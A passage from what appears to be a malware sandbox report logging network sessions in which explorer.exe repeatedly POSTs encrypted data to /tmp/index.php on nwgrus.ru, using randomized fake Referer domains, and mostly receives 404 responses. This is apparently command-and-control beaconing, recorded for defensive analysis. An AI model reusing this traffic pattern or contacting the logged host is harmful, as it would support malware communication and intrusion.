                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.449759180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:52.243201971 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://xnrwcbelwfy.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 120
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:52.243201971 CEST120OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 70 18 b9 92
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vupo?ZZeeBZxwgoZa
                                                                                                                                      Oct 8, 2024 03:14:53.618547916 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:53 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.449760180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:53.627556086 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://hidbwvhnrpsqtckd.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 167
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:53.627556086 CEST167OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 41 42 ef e3
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuABA|N^=7n05aBy-OF //ZOWiy*@a
                                                                                                                                      Oct 8, 2024 03:14:55.011884928 CEST189INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:54 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                                                      Data Ascii: #\6Y9l_m=rA


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.449773180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:56.384501934 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://kldixuwrvoj.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 322
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:56.384537935 CEST322OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 26 5e e0 fc
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA ,[k,vu&^W2MkU?Ey|8:mvl10yk*;&M<P#LWAypY.4:!ahGSPqzK41
                                                                                                                                      Oct 8, 2024 03:14:57.757764101 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:57 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.449784180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:57.765925884 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://jrduoddrbbwoyfog.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 312
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:57.765960932 CEST312OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 20 d9 ee
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu4 O+Qle^RfLX*7LRFATTvG2]Q$s~:HBWvT^rWv-@c& M
                                                                                                                                      Oct 8, 2024 03:14:59.141500950 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:58 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.449795180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:59.148987055 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://fadawnjwyvdbowke.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 248
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:59.149019957 CEST248OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 60 56 c3 bb
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu`VTCNnJNx{q*O|767q)O 8aR75.$MHWbaT3^DGl|a\x|8^ary5Q)
                                                                                                                                      Oct 8, 2024 03:15:00.543446064 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:00 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.449803180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:15:00.551059008 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://ejoaxqvdwaljnps.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 166
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:15:00.551074982 CEST166OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 55 20 d5 e8
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuU zZ+N;;pm*[dk?^3-!%/Z6+@sT3b#
                                                                                                                                      Oct 8, 2024 03:15:01.942102909 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:01 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.449812180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:15:01.957376957 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://qmmqfrtscgkdrbea.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 229
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:15:01.957405090 CEST229OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 29 18 df 8e
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu)R,z#L%r?\&n\G$)}f9PP~%<'{m;lTJ:z7D!U;W`IoRd
                                                                                                                                      Oct 8, 2024 03:15:03.346745014 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:03 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.449822180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://kcwpxhfqrcwcynne.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 180
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:15:03.354633093 CEST180OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 32 25 d9 a0
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu2%_r\>eeC{:)<oqJs62-H UOLNP,W%Q
                                                                                                                                      Oct 8, 2024 03:15:04.734694958 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:04 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      30192.168.2.449831180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://ksfanihxkdmgc.net/
